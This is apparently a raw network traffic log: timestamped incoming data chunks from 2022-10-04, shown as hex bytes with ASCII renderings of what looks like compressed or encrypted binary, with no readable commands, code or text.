                                                                                                                                                                                                                                    2022-10-04 05:11:13 UTC17992INData Raw: 27 f7 17 28 81 7d a6 1e e6 84 6b fb e1 02 71 1f 0a ab ef da af 59 9c 42 d8 69 c6 bc 95 30 4a f1 35 70 97 b9 5a 36 a4 e5 5d e9 73 c4 12 bd 74 34 81 3a b4 e9 cf e5 99 1e c0 de ad 8c 2f 47 36 c7 e3 bb b6 8d ca 41 23 af 1f d9 f9 56 4b da 3f fa 14 63 66 15 b2 32 5c a8 6c ef a4 87 c5 20 1b b1 99 dc 5e a9 6b a4 4e 88 ca 66 f7 36 53 b6 c8 76 db 2d f3 ed 02 09 5a 43 98 0a 61 96 77 e9 98 9d 33 c2 b4 ac 3f 0e 2c 17 82 86 c4 8c fa 07 4f 24 db 2c 35 e3 9f 74 7d 17 90 a7 90 8f c5 48 1a 7e 71 07 8d 74 a7 d0 2d 45 0e 5e 7c c1 46 a3 cf 22 5d ce 7f fb 96 38 cd a3 18 b6 6c 08 f9 2f 00 fe 3a 1e a5 30 e4 bc 0a 31 b1 d5 ef 07 65 00 24 d5 79 30 53 2c 2b b3 16 2b 53 e7 ad f4 09 60 f3 42 12 8b 29 4e a1 d9 44 23 80 a5 d9 cf a1 4a 14 54 56 77 5a e5 5e e1 c3 34 80 36 bf e0 e6 44 94
                                                                                                                                                                                                                                    Data Ascii: '(}kqYBi0J5pZ6]st4:/G6A#VK?cf2\l ^kNf6Sv-ZCaw3?,O$,5t}H~qt-E^|F"]8l/:01e$y0S,++S`B)ND#JTVwZ^46D
                                                                                                                                                                                                                                    2022-10-04 05:11:13 UTC18008INData Raw: dd 30 93 a2 65 4c ed 4b 67 a5 60 b1 fb 65 ac 3b 85 e0 f8 6e 97 77 e3 a4 15 33 c1 c6 4b 7a 9e e4 de 6f c2 8c 1a 91 97 7f ed 25 b3 fa 1f d6 39 98 10 95 c3 60 8e 37 77 a9 c3 1b 9e 6e 05 31 0b a6 d8 36 9d 00 14 21 87 a6 07 56 85 bf 7b ca e4 ed 2f 40 54 25 91 d3 42 d7 e7 a6 e2 1c e6 76 f7 c3 59 03 0a aa 76 e6 67 f6 a6 a1 37 9c 0f f1 46 bd ab 5c 22 ff f7 2e 20 a6 56 d1 a7 77 0f e6 43 e9 5a 7c 24 c5 05 db 16 13 ab 2a 2e d6 d7 08 ce 53 c7 69 72 16 76 7d 57 36 e3 21 f4 16 e2 f3 0a 14 87 c6 11 fb 52 eb 5b 29 03 1e e5 50 03 3b 3e ba ee 3f 02 0e 2b 20 e0 46 33 d7 47 e5 15 44 af 5e 11 d2 52 6b 3a 0c de e0 a2 0b d2 b6 98 68 6d 72 7e 00 c7 11 ae 06 3f e4 85 19 58 2a 2c 25 76 62 f3 dc f3 96 00 47 9b e3 b1 f3 f5 07 85 0a 35 2d bf 2e 01 60 22 bd 5e e3 dc 79 1d 8c db f2 e5
                                                                                                                                                                                                                                    Data Ascii: 0eLKg`e;nw3Kzo%9`7wn16!V{/@T%BvYvg7F\". VwCZ|$*.Sirv}W6!R[)P;>?+ F3GD^Rk:hmr~?X*,%vbG5-.`"^y
                                                                                                                                                                                                                                    2022-10-04 05:11:13 UTC18024INData Raw: d5 9b d7 79 c8 7a d8 1f ad c3 5a af 8b a3 52 52 3e 46 fe 9e 9d 8d 0c 11 2a f5 11 26 ee 33 d1 89 40 30 d6 2b de c3 a0 66 df 9c 3a cd 0d dc ab ba 4d e0 f7 cd 22 7f ac b3 32 8c dd 56 5f b8 b6 54 c8 06 de 48 31 2b b5 7d b0 59 bd 47 5e ee 21 9f 5b d9 33 c3 f5 02 53 93 60 9c b6 d3 56 c8 23 c4 d0 05 f2 ff d2 3d 52 48 0c 3e b2 86 18 1c 85 00 8b d3 a4 21 a1 20 4a a1 54 e1 52 fa dc c7 16 68 7d 77 a9 3d 63 3f 7d 49 a9 c0 f9 8b d1 e6 6b 40 56 22 59 d7 72 64 d4 89 50 db 74 22 bc 6a a7 39 6d 15 be f4 26 bc f6 86 a5 65 7c c9 48 21 ac f0 ef e0 57 ab a2 af da f7 8b a9 7e 4f 50 8c 34 4f fb 5d 0a 74 51 ca e8 14 45 66 e6 3e 24 85 30 3c 5f 60 5b c4 2e bc 45 97 c6 35 f2 8f 76 4d c5 75 3a 16 1e 57 60 f4 05 a8 62 88 28 08 64 32 00 bc f7 5e 44 75 25 98 1d 57 68 37 41 35 7d 1a bf
                                                                                                                                                                                                                                    Data Ascii: yzZRR>F*&3@0+f:M"2V_TH1+}YG^![3S`V#=RH>! JTRh}w=c?}Ik@V"YrdPt"j9m&e|H!W~OP4O]tQEf>$0<_`[.E5vMu:W`b(d2^Du%Wh7A5}
                                                                                                                                                                                                                                    2022-10-04 05:11:13 UTC18040INData Raw: 5b e0 53 cb 85 e2 64 3b 41 b0 51 9d 6b f6 0e 19 e7 db 32 b9 85 1a 45 7a 6c 61 45 33 b4 8d 2a a6 14 e8 c7 09 66 f2 2e c1 95 b2 07 89 eb fd 54 fe b8 74 40 a2 5c 16 87 42 a9 62 5d 3b 0d 83 9f 44 d6 d6 e2 2d 34 06 71 39 81 75 18 41 25 c4 43 60 3f 16 2c b0 3d bb d0 da 6b c0 e2 d4 0f cd ec 11 a9 2f d6 dc e7 4d 3f cc a0 db 6a 4c f2 71 4b c4 58 3b 62 a6 f9 5c 06 8b 49 eb e0 00 d5 e0 85 17 47 ee 1f 4c 55 7e f6 e5 5b 24 83 ad 72 ce d9 a1 e0 57 27 fa 6f 2d 6a 86 08 4f 66 96 69 e8 64 7d b8 96 0d 74 c4 85 c8 f2 5d 93 e4 6d 28 9f ce a2 61 85 62 35 eb a4 95 5f 9b e0 68 b3 e3 1b eb d3 62 39 75 e1 b5 7b 12 7d 31 17 5f e9 01 7e f6 7e 0d fe 42 83 5a 6f 4c 2f df a7 a1 bb 28 05 d2 f8 60 b5 8b 58 59 19 1b 1b d7 da 85 ff 66 c7 72 4c df 2b 58 40 bf 48 a5 22 45 70 26 9a 12 35 5c
                                                                                                                                                                                                                                    Data Ascii: [Sd;AQk2EzlaE3*f.Tt@\Bb];D-4q9uA%C`?,=k/M?jLqKX;b\IGLU~[$rW'o-jOfid}t]m(ab5_hb9u{}1_~~BZoL/(`XYfrL+X@H"Ep&5\
                                                                                                                                                                                                                                    2022-10-04 05:11:13 UTC18056INData Raw: 63 e1 c3 6b 61 d3 05 18 96 dc 22 4e 54 84 1b 84 b6 c3 79 4f ae 8e 7d db 27 d0 e6 bb 3d bd 14 28 90 05 63 50 ce 1e d8 24 23 82 a6 5f f6 a1 80 a7 9e 24 fa c5 e6 32 7e 85 a6 6f 5a af b7 67 2a 50 48 47 1c 9e 8f 1c b0 11 7b 7f 1f 2f 85 95 36 03 39 45 c6 7e 08 07 d8 f9 b1 9e 94 f6 11 5d 37 77 bc fa a9 c4 c7 6e de d5 b8 c0 80 71 4e 15 c2 ad c4 a3 91 d8 bb 4c 82 ff cc 91 fc 52 60 f2 fa 12 1c 22 b0 5a 4f c5 e9 64 98 ea df 4d 89 46 0d 5b 3a 0d ce 95 9a cf 90 29 b1 c0 27 d0 c7 e7 61 21 ac 44 30 93 57 09 46 16 d0 6e 89 2e 26 f5 3e 6b bf 3a 8d 4a 70 9b 1d b3 0a b4 24 0b 37 c9 d3 c0 bb c4 ec bd 49 bf a2 b7 45 86 bf 94 0c a3 ea d1 58 08 08 1e 06 de 87 fa 1f 47 6d d0 d3 22 92 07 61 e7 ab 7b 17 c0 91 97 65 4f aa b3 31 42 67 3c 52 79 05 ee 49 b8 07 31 94 77 4d c9 cf 5f bf
                                                                                                                                                                                                                                    Data Ascii: cka"NTyO}'=(cP$#_$2~oZg*PHG{/69E~]7wnqNLR`"ZOdMF[:)'a!D0WFn.&>k:Jp$7IEXGm"a{eO1Bg<RyI1wM_
                                                                                                                                                                                                                                    2022-10-04 05:11:13 UTC18072INData Raw: d6 dc 02 5f 0b b9 b1 51 8e 7c b0 ac 9b 76 5a 33 88 bd 48 05 72 d5 2c 1e 06 32 37 8c 43 22 b9 26 61 89 2b be 4a f7 c7 cf 99 1e 91 6f 98 7a 24 6c 08 3a b0 c1 ab 04 be 2c e4 57 b1 11 5a cf 41 b8 c1 c7 34 48 8a 85 05 6a 12 46 03 cb d5 bc 6f f0 f9 95 93 2c 95 1f 3c bf 78 c3 3c cf 7a 24 e1 3f f8 f3 95 58 9c 36 c5 ae cc 5e b3 30 8c 96 7a 32 0e 80 4a 30 2b ee f3 65 96 39 7f cd 51 c7 58 71 6e 90 c2 08 7b 5b be 9a 10 48 18 80 22 a7 5e f9 74 a0 09 bc 9c b7 5a e6 5b e4 af fc 2c 7b 31 fa 9e 8f 77 98 0a 00 07 fd eb be 31 d4 b8 40 db be 6f b3 ed ed ba 2b 2e 03 8d 4d df 98 e7 81 71 f6 4d 66 ae f8 de a1 fb f1 b4 7d 1f a8 19 c1 47 78 2c 31 0d ba 84 f0 3d 50 4f b1 bb 5c 43 f8 6c 48 bb ea d9 7b bb 66 85 5a cb a8 ee d8 80 45 af e2 2f 32 10 c4 58 48 dc 9e 74 e8 6b 4b a6 0e 53
                                                                                                                                                                                                                                    Data Ascii: _Q|vZ3Hr,27C"&a+Joz$l:,WZA4HjFo,<x<z$?X6^0z2J0+e9QXqn{[H"^tZ[,{1w1@o+.MqMf}Gx,1=PO\ClH{fZE/2XHtkKS
                                                                                                                                                                                                                                    2022-10-04 05:11:13 UTC18088INData Raw: 20 48 06 51 26 34 59 bd 13 96 1c 1a ae ea 97 0f 71 6b c9 ff fa c5 d9 a8 bc c9 9c 14 35 07 a5 6e c1 eb f5 bc 67 c8 8d fc 1b df 97 60 cd 86 7e 56 33 44 a2 10 84 81 0f b9 cb 7f 79 d3 83 33 4a d6 fa 29 e7 fd 6a d9 2d d3 47 1e 29 1f dc 0d cf 40 a8 fa d7 0c 74 ff fe 84 38 24 b7 11 98 cb 9a 0e e3 93 e8 61 22 13 74 91 bf bf 48 61 7c 66 9c 38 47 89 bc 10 8e ed db 47 aa 32 1d 65 a6 4c 20 75 ba 22 cf 76 dd bd d7 a2 0f 6a 15 2a a0 c2 2e c1 8f 86 61 79 0f fd 35 5c 68 a7 d7 08 97 60 f9 01 7b 3e bf e0 00 5d 66 a0 77 51 d2 5d a2 2b 87 47 79 90 85 3d 22 5a ab e4 4a db 89 dd 1f ec a8 6a 16 47 45 a8 8e fb 27 ea b8 eb 1e 2e d7 bf 9b 9a 5a fa da 4f 1b 7f 6e e7 34 2e ee 86 97 63 7f d6 79 fb d6 65 49 64 c3 04 c1 7c 2f 87 fe 57 f3 72 99 11 9f 4b 97 d2 76 7a c5 2e bc 0f 88 ba 05
                                                                                                                                                                                                                                    Data Ascii: HQ&4Yqk5ng`~V3Dy3J)j-G)@t8$a"tHa|f8GG2eL u"vj*.ay5\h`{>]fwQ]+Gy="ZJjGE'.ZOn4.cyeId|/WrKvz.
                                                                                                                                                                                                                                    2022-10-04 05:11:13 UTC18104INData Raw: e5 3c a2 7c d7 e6 e7 53 9b ea 21 ae d4 65 6d 88 2f cf d6 7b a6 8a 6c 01 4a 49 49 30 56 89 57 85 05 0e 03 7d 59 ba eb 18 59 c9 62 fc 19 e3 ef 0b 9d ae a6 ed 43 c6 2c 3c 69 4f c4 68 85 4e dc 18 be ec f1 3f ab 8d 07 4f 2c be 54 ae 65 09 60 2e 0d ff 42 ea 71 26 ad 68 ea 3a a7 c2 af 5b ae 36 82 d9 2e fc 1d c2 f7 bd 46 c1 e2 4e 39 e1 3e 18 53 18 70 76 85 78 54 fd 7f 77 b1 2a a9 64 ce 7d 65 b3 1f 9e ce f2 56 35 b3 f9 3f f4 36 27 a7 00 1c 11 83 41 44 1d 63 40 83 7b 61 76 62 ef e7 ea ca 6a c7 87 9b 17 71 d0 e2 ee af 1c 95 28 64 a7 eb 7c e9 d0 cf c4 a0 17 1b d3 30 cf 39 b5 ce 3d 54 e3 4e 36 77 ff 65 2f 52 4f eb 87 f4 ea f6 f8 44 b8 dd 5a bf 6b 1e 75 e2 cc 0d 84 8d ce e1 91 7e b7 39 c4 11 c2 b2 06 c8 fe d1 96 a1 d8 34 88 ab 7c 54 5a 59 80 ac 37 9c 0c e9 30 cd e5 8e
                                                                                                                                                                                                                                    Data Ascii: <|S!em/{lJII0VW}YYbC,<iOhN?O,Te`.Bq&h:[6.FN9>SpvxTw*d}eV5?6'ADc@{avbjq(d|09=TN6we/RODZku~94|TZY70
                                                                                                                                                                                                                                    2022-10-04 05:11:13 UTC18120INData Raw: 11 2e 92 90 fb 1d 37 08 84 54 af 9c b7 cc 7c d3 1a ec 0f d3 ee ef 5f 6c 03 60 e9 81 f5 5f 01 3e 6d 11 e8 7c bb 5e 7d a6 5e 69 46 33 67 92 c1 21 a1 29 28 f4 df 38 ea 8b 3d 0f 4f 8a a1 6f 7a 43 db 01 24 c8 07 3c 49 8e cf c8 af 81 e5 e5 31 3b 8e 2c 19 1d 88 7f 71 3c 02 b2 d2 e4 d4 ec 03 bc 04 bc 70 fb 27 7a 2b fe 33 33 35 c8 20 6a 57 45 c6 f3 a4 6a 88 a6 4b 4b 1f bd 2e b7 f7 3a 52 c0 61 5d 92 fb aa 72 ff eb c2 06 de aa d4 31 54 6b f3 01 d8 69 86 1d ef f7 76 83 9e 4f 0a 44 8a 88 68 86 e3 6e e4 7b ab 3f 6d cd 7a 4a 27 d6 03 53 c5 fa 82 c3 ba de 24 ec 3f 2c 1b 82 7c 38 37 b5 de 88 9a 75 8b d4 5a 7e af 2e fd 10 ae 12 30 30 0a 3c dd 7f 0f 5a 1e ec 15 d1 cb 98 c6 98 06 f2 f2 39 45 78 59 46 c1 fc d7 37 ae d4 38 34 a0 af 0c 3a a7 73 61 d0 82 f7 b8 ad a9 45 74 04 12
                                                                                                                                                                                                                                    Data Ascii: .7T|_l`_>m|^}^iF3g!)(8=OozC$<I1;,q<p'z+335 jWEjKK.:Ra]r1TkivODhn{?mzJ'S$?,|87uZ~.00<Z9ExYF784:saEt
                                                                                                                                                                                                                                    2022-10-04 05:11:13 UTC18136INData Raw: b3 5c 39 0b df 69 fb 64 b6 e7 ac 00 66 3a c0 64 ed 62 1d 20 b2 c8 70 39 78 ce 39 9f 41 58 a1 d4 f0 9a d1 be f4 21 a4 8b 41 9d 14 20 0b 14 5b fb 21 d5 6c 53 f6 a2 e6 eb 7b b5 c3 65 4e ed bc 45 eb e6 d7 d5 85 71 d0 17 f3 0d de 0a b0 99 58 23 a7 5e 09 c2 12 fd 4d 67 a8 08 83 33 2a 56 e1 c1 be 4d 26 c0 6a b4 7d 50 95 b4 00 14 74 09 85 02 ca 76 19 31 29 24 0c 71 80 5c 64 bb 83 7b eb a7 f1 7c 12 99 d1 97 3c 06 21 c4 b6 81 b9 1a d9 a2 41 21 35 77 a7 2f 51 e0 c3 26 e0 8f 0a 6c 92 02 19 54 f5 89 57 a3 a2 f8 50 26 08 1c fa a5 5c b5 fc 6d f2 07 84 3d 91 ce a5 a5 b4 5d bd 4d 12 64 ff 61 10 fd 03 f2 3a 0f bd 45 ee 1d 45 f9 ef f7 b6 3c 43 ba ba 21 3c 98 46 7a 10 b1 eb 8a 64 d1 74 69 e1 a4 fd 9a ae 9b 36 4f 29 a4 98 98 96 ab d9 f7 ba 53 ad fc bd df 4c b9 16 c5 1f 48 1f
                                                                                                                                                                                                                                    Data Ascii: \9idf:db p9x9AX!A [!lS{eNEqX#^Mg3*VM&j}Ptv1)$q\d{|<!A!5w/Q&lTWP&\m=]Mda:EE<C!<Fzdti6O)SLH
                                                                                                                                                                                                                                    2022-10-04 05:11:13 UTC18152INData Raw: af f5 68 ed 5b 0c 74 45 84 d6 d6 da b8 d8 8c c0 36 a7 4a cf 95 df b3 b8 85 ac a0 2c c3 8f d9 00 4c 6f 43 25 a5 86 70 b6 07 0d 82 e0 5b eb f4 be b9 e8 2d ff 14 f1 dc a6 8e 09 ff f5 b6 31 bc 81 94 55 e0 6e 18 f2 fa ec 27 88 ad 3c 7a 10 95 fd ac b0 9a ae a4 6a cd 44 93 70 ca b6 e8 6e 95 36 38 f5 62 33 e1 3d 5a e4 fc 97 24 a2 46 06 c4 ca 0d 97 d7 59 c7 71 b6 e8 84 a2 38 7d 2d 0f 74 8b 93 0e 76 ee 59 a3 d1 ad 2f f1 ba 54 d9 72 52 25 65 22 c4 25 90 4e 8c f2 79 e9 38 a9 3d bd 3e 3e 2e e4 a1 28 c8 4e 93 15 6f 3b be f8 ab be eb b5 96 26 b2 31 c0 43 74 a6 49 d7 b4 fb 42 af 38 25 1e 25 99 17 a4 d1 29 69 1d dc 7f 77 4f ae ee 05 c4 b6 ee db a2 f1 9f 4f 5f b5 39 7c 4c 28 e4 8f 91 0b 36 99 ab 7e 5b 77 51 33 d9 43 cc 0f 41 d0 2f 60 3c 30 5e 74 4d 28 da 79 78 56 9b c8 06
                                                                                                                                                                                                                                    Data Ascii: h[tE6J,LoC%p[-1Un'<zjDpn68b3=Z$FYq8}-tvY/TrR%e"%Ny8=>>.(No;&1CtIB8%%)iwOO_9|L(6~[wQ3CA/`<0^tM(yxV
                                                                                                                                                                                                                                    2022-10-04 05:11:13 UTC18168INData Raw: f6 50 d7 c0 b1 1a 09 8d 06 2f 2d 71 5e b7 13 d5 02 4d 44 78 a0 1d 0d 77 ad ce 70 9a 0f 45 63 26 36 31 21 43 b5 bc 6a 44 f1 a7 d6 17 54 40 15 bf 44 d5 03 14 6b 84 dc 8f 3a 36 b9 83 dc 68 ad 87 e1 52 13 74 e4 7b 25 05 7c fd 85 b9 d2 52 ef d1 43 27 4f 6c eb 7a cc 33 f7 c9 db b4 18 4e bb 2c 5b e8 5c 8f 8c ad 89 26 2a 91 61 e8 63 b8 22 71 66 87 a2 10 82 4c 70 4a 72 ef fd 15 e7 ba ba 3d c1 6c 9d a1 e5 d8 70 7c 19 3e fa 0f f9 1b ff d3 82 ce cc 70 82 d9 9e 1a 59 ff 1b 5e f6 95 6a aa 42 31 2b 43 c0 65 de ca c4 0d 62 33 1a 76 82 03 33 27 61 79 66 42 05 7d 96 a7 40 dd d3 58 a0 5a 76 36 93 6b 6c 03 b4 47 1d 59 4f 3d 1d 35 26 13 9d 9c c4 44 ac c8 1e 96 d8 e2 e4 a0 f4 df 0b d1 e3 2d 6f 49 14 2e 29 08 04 e3 c0 89 81 74 ac 88 4f e8 38 3e 27 af 94 51 25 04 99 cb c2 bc 1a
                                                                                                                                                                                                                                    Data Ascii: P/-q^MDxwpEc&61!CjDT@Dk:6hRt{%|RC'Olz3N,[\&*ac"qfLpJr=lp|>pY^jB1+Ceb3v3'ayfB}@XZv6klGYO=5&D-oI.)tO8>'Q%
                                                                                                                                                                                                                                    2022-10-04 05:11:13 UTC18184INData Raw: 26 5e 0d ac 29 d8 64 f4 13 1b 72 f0 78 b1 b3 3d 6f 43 50 74 39 7a 44 e7 44 fd a1 3d a1 3f a8 3b 91 6e 7d 22 68 d6 27 37 68 67 eb a7 bf e3 96 5a 44 d4 b1 8e 63 c6 eb 02 34 de 8d 1d 05 49 ca f3 ab 00 5d 87 27 bc 5a 9e d8 f4 a5 f9 2a 62 3d 03 fe 62 47 52 3e 93 bf 24 ec 9a 2a c1 a4 7f 70 e9 3d b4 48 1b 9a ce d4 51 b2 a2 e5 10 13 2c 53 d2 c0 fd 02 f8 b8 f8 10 05 f1 9e c7 5b 95 3e b4 f4 c1 93 0f e8 2f 69 d9 0a 7a 46 06 35 85 a8 f0 94 a5 95 2b 26 5f b8 f3 f0 17 ac d5 82 87 70 32 76 42 5a 89 7a 60 09 e3 58 fb f8 fe 33 58 0b f9 f6 9a 35 c6 f3 35 fd c9 6b 6b e2 18 ec 25 b0 08 4d ba 7f 66 c1 ca 3f 8e 86 b7 8b 4e 4e 37 7f ab 2e 4b 25 a1 2e 67 68 50 dd 76 9e 74 7c 90 bc 07 86 d3 cf 69 5b 0b 1a 54 95 42 af b5 a8 af ce 01 23 79 3b ec aa f0 de 40 d6 f9 81 74 ac b3 f5 b5
                                                                                                                                                                                                                                    Data Ascii: &^)drx=oCPt9zDD=?;n}"h'7hgZDc4I]'Z*b=bGR>$*p=HQ,S[>/izF5+&_p2vBZz`X3X55kk%Mf?NN7.K%.ghPvt|i[TB#y;@t
                                                                                                                                                                                                                                    2022-10-04 05:11:13 UTC18200INData Raw: 8c 23 83 90 a2 49 42 ec cd 3f a5 1d a0 44 82 93 57 9e 65 63 00 00 72 a3 2f 00 fa e8 95 ee 47 6f 18 63 eb 8d ec 0c bc 35 9f 18 aa 84 16 10 2c 55 e0 16 73 fc 2f b7 e3 86 6d d0 8d 2c 63 fc 74 92 5a d4 d3 29 4a bf 91 67 cd d2 a1 6a b4 ae 2d 1d 5f 28 8a b4 9b be 0f 6b ea fb c1 0f 7d 66 5f 40 a5 35 33 1e 96 15 b1 25 f0 e6 f0 6a f8 ef d5 6c a4 e7 e7 c6 43 c3 9c f3 98 30 6e e7 e4 7c 50 ed 08 59 c1 fd 2b e4 51 cd ab dc 6b ad 77 a5 47 43 6d bd d1 ec b2 fe 3c 35 9e 68 60 e7 cb d7 a4 62 e4 96 1d 1b 0a 50 10 3c 07 02 b4 09 b4 ce 67 62 b0 96 9e 5b b9 8e 1a 0b 85 9b ce a6 43 48 9e 80 5c 90 b1 e9 59 b1 f5 bc bd 05 e6 d4 87 d8 fc 75 5f fc 0e ae 14 c8 e2 a2 ff f7 d3 93 3c c5 fb 8a 47 ed 55 08 cc 66 c0 96 07 d1 62 16 29 04 30 44 bf cd 9e 90 80 3f 30 41 d3 38 7a 37 e5 27 18
                                                                                                                                                                                                                                    Data Ascii: #IB?DWecr/Goc5,Us/m,ctZ)Jgj-_(k}f_@53%jlC0n|PY+QkwGCm<5h`bP<gb[CH\Yu_<GUfb)0D?0A8z7'
                                                                                                                                                                                                                                    2022-10-04 05:11:13 UTC18216INData Raw: c0 62 d5 4f ff 60 dc 29 83 11 27 75 50 a7 b8 b7 0e bb 3c 1d e5 da 78 be 46 f5 6b d0 12 c1 53 bd d6 ca d4 ac ff f2 23 52 22 51 a5 71 8f 24 50 91 f1 ff f3 c8 42 d1 f2 c4 72 e3 b6 68 96 a4 92 1e c9 d2 59 2f 0d 4d ac f2 8f 9f 66 fa d7 f4 87 04 f1 1a 84 3f 6e a8 62 86 2f 4c 8d d8 0c 36 a5 c3 8b 38 92 f9 85 6b f0 cf f4 fb 36 44 f5 54 2c 29 d2 09 37 47 76 ff 2e 8c 6d 51 5f 1e 4c 55 85 e9 73 12 5b 25 2c cc 06 fe 5a ec 78 16 a1 5c 0c 35 ef 73 79 83 99 1a 2c d8 27 fc 0a a4 e7 30 ee 4f 41 bc 35 e4 17 a5 7b ee 9f 96 d7 25 3e ad 34 af 44 45 68 95 f4 30 08 0a 75 37 df 9a 1f 21 5e 9f d5 69 af 5a 13 2a 47 cc e8 9a 1d b6 5e 40 d4 a1 3f 1b 19 7b 16 c7 4e 34 69 eb f2 37 cc b7 81 70 b8 d9 f5 b3 94 b2 a3 87 9a ff 84 a0 23 b9 a2 90 39 3b a0 c8 57 cc fd 25 2e 8d 16 33 01 85 58
                                                                                                                                                                                                                                    Data Ascii: bO`)'uP<xFkS#R"Qq$PBrhY/Mf?nb/L68k6DT,)7Gv.mQ_LUs[%,Zx\5sy,'0OA5{%>4DEh0u7!^iZ*G^@?{N4i7p#9;W%.3X
                                                                                                                                                                                                                                    2022-10-04 05:11:13 UTC18232INData Raw: 94 9a 09 4b 6e e8 9d 70 7d b9 1a b7 42 6b 7e f6 9b 9f ca 45 59 5a ef b1 ab d9 d5 3f 27 c9 95 94 40 8b de 3e 68 1d c8 fd 3b cc b0 07 b0 e5 c5 12 ce 9d 94 30 50 6b c1 a3 26 30 48 4c 92 03 07 66 9a 03 c4 d0 25 d2 3a 4f 98 24 18 2a 96 ea d0 c8 81 2c 77 19 8d 8d df 5c f9 a3 fb 51 43 2c 0a 4b fc fb f1 a1 f1 24 33 6c a0 50 3c 2c 6f 4b 4a 4f b3 8c 7a f6 ea 14 6c 51 3e a5 ee bf 61 a4 ce 95 9a 40 1b f4 f4 c3 53 de a8 b9 9a 0f 3d 5d f3 ad 0c d0 47 a1 f5 02 d9 d4 c5 c2 78 df bc 32 a7 26 6f 60 09 57 e1 31 0d 6e d7 c2 37 a2 12 52 ef 87 1b 1a 8c b8 f8 36 3c 31 79 da 35 39 a4 82 7c d4 4f 03 6e 44 cd 8a ab 4c 48 86 bd e0 f9 06 71 85 63 c5 93 f5 4c 4c 54 d9 79 e7 e8 6d f2 ab eb 7e 69 ed c3 72 5f e3 3a 98 4b 73 6b 67 5f 92 9d b9 b4 97 51 5a 68 48 f4 23 22 4b fd d1 3d 34 f8
                                                                                                                                                                                                                                    Data Ascii: Knp}Bk~EYZ?'@>h;0Pk&0HLf%:O$*,w\QC,K$3lP<,oKJOzlQ>a@S=]Gx2&o`W1n7R6<1y59|OnDLHqcLLTym~ir_:Kskg_QZhH#"K=4
                                                                                                                                                                                                                                    2022-10-04 05:11:13 UTC18248INData Raw: 74 a7 79 19 82 38 fd ae 71 39 d1 6c 5a cc 77 f6 72 32 3f 59 e9 5a 86 4e 9c 3e ba 6b 90 9b 37 fa 59 d2 96 b3 3f 88 a4 43 00 c7 c2 dc 63 26 c6 37 24 5d 08 21 57 73 49 12 71 69 e0 ec 24 f9 b8 0d 4e bd a8 a6 11 70 4a df 9a 81 1c 67 b1 78 11 8e d1 ad b7 84 15 61 22 8c 5d aa d7 9d 56 4e 64 33 7c 78 a0 aa 4a 59 e5 d7 3e 67 89 d7 40 c5 15 f4 8e f3 47 33 9b 13 81 fe 29 f0 0e 21 ca a2 ba cd 33 07 75 aa 5c 48 65 5f de 99 72 2b ba d2 e7 b9 6d 0c 93 d0 70 b7 37 b2 83 b4 48 e1 e7 ad b7 ef 70 7d f8 4e d2 f8 1d ba 92 56 20 ee 48 5f f6 5f 1b 52 a3 ca a2 35 13 82 82 61 a5 85 27 ad ad e7 42 4c ea a1 3b dd 7c 34 f7 88 a4 b3 c6 bc d5 96 20 29 14 94 64 5f 98 56 95 d1 28 48 8a f4 64 20 eb 0e 2c 65 97 65 b5 0f f4 40 0f 42 0a 98 6a 90 78 13 36 e6 d5 75 5a 6e b4 6f 45 70 1b ee ec
                                                                                                                                                                                                                                    Data Ascii: ty8q9lZwr2?YZN>k7Y?Cc&7$]!WsIqi$NpJgxa"]VNd3|xJY>g@G3)!3u\He_r+mp7Hp}NV H__R5a'BL;|4 )d_V(Hd ,ee@Bjx6uZnoEp
                                                                                                                                                                                                                                    2022-10-04 05:11:13 UTC18264INData Raw: 97 ba ab b4 bd 94 46 18 7b cc df db 84 3e 02 90 00 c5 a4 17 68 34 d0 00 d5 00 ae 7d 5b 4f a8 43 8e dd da f0 9a 4c a4 81 28 1b e2 5c bc 04 56 57 e7 2e 69 f2 cf 9f 8d 25 61 4c c6 39 ae f7 0a b3 16 9d 2b 19 e4 60 3b aa 91 57 47 51 b5 cb 0a ab b3 f0 23 cc d6 72 74 f5 96 50 4e 79 91 ff ad 1a 41 a3 a3 d1 2d 38 29 2a a2 38 c4 1a 77 73 c0 ef 90 3c ff ba 73 eb 6f 37 cb ca e1 4a 30 5a 21 5e 6a 28 a6 f0 65 c5 81 5d 13 c4 9d 10 0c 2b bb 5b d5 ac 91 fc 8d 5c 18 64 96 fb c1 71 a0 d9 c6 72 5d aa 25 94 e0 ba 76 53 68 aa 28 0d 33 30 59 c8 9f 27 b6 05 53 11 5d d0 d4 47 04 2f 4d d3 eb 97 9f 10 6f a8 20 43 90 47 b9 ae dc a2 da e6 b7 21 d0 5b 5d cf 0f 6b ad 05 a2 cc 31 0f 6f 8d ef 6b be 0a e7 1a 4a e4 52 9e 63 83 47 26 f9 43 8d 72 9b b0 09 46 06 89 69 96 5d f8 90 f5 1e ad c7
                                                                                                                                                                                                                                    Data Ascii: F{>h4}[OCL(\VW.i%aL9+`;WGQ#rtPNyA-8)*8ws<so7J0Z!^j(e]+[\dqr]%vSh(30Y'S]G/Mo CG![]k1okJRcG&CrFi]
                                                                                                                                                                                                                                    2022-10-04 05:11:13 UTC18280INData Raw: 5a 6c ba 9e 3d 1e 67 3f ad 19 2f 95 df 23 a9 26 bb 48 ff 68 71 5c 8f e7 34 c7 1e 60 dc 5a 4b ff f9 07 05 e8 94 c1 ad 83 f7 4b 80 f8 8c e9 28 69 98 d6 e3 9f 1c b3 35 b3 0b 30 80 77 85 14 5c f9 a5 da 36 f2 d3 90 08 cb 4f c0 8e b6 9e 78 47 b2 55 8d c9 83 13 7f 37 d0 8c 19 19 cf 2a 35 49 66 c2 2b 9e 12 7c 5f dd 0c c6 7b af f0 5f 65 df 69 bd 3f 78 5f e3 8f d3 6d a9 24 14 d6 f5 86 19 55 86 7f 7a f5 50 63 85 ec b8 f8 d9 d9 97 75 d0 de b6 8e cf 1a 1e 13 b0 1c a6 e7 d1 f0 61 bf 02 cd 64 16 0e 06 be 27 f5 d2 f6 25 ed 3c 33 5e f6 0c 20 04 cd 24 bc eb d3 54 c0 36 9f d6 d8 24 3f 8e 79 37 cc 7e 0e 4b de 0e c9 e6 a5 1a 63 c6 be c0 ae c9 0a 65 98 04 91 bf ee 75 d9 77 6a 41 35 9e 6c 90 51 6f d8 fe 1a a9 67 62 f1 e2 ce f1 b3 99 aa d4 7a ea 17 04 0e a3 e9 12 88 aa 30 13 15
                                                                                                                                                                                                                                    Data Ascii: Zl=g?/#&Hhq\4`ZKK(i50w\6OxGU7*5If+|_{_ei?x_m$UzPcuad'%<3^ $T6$?y7~KceuwjA5lQogbz0
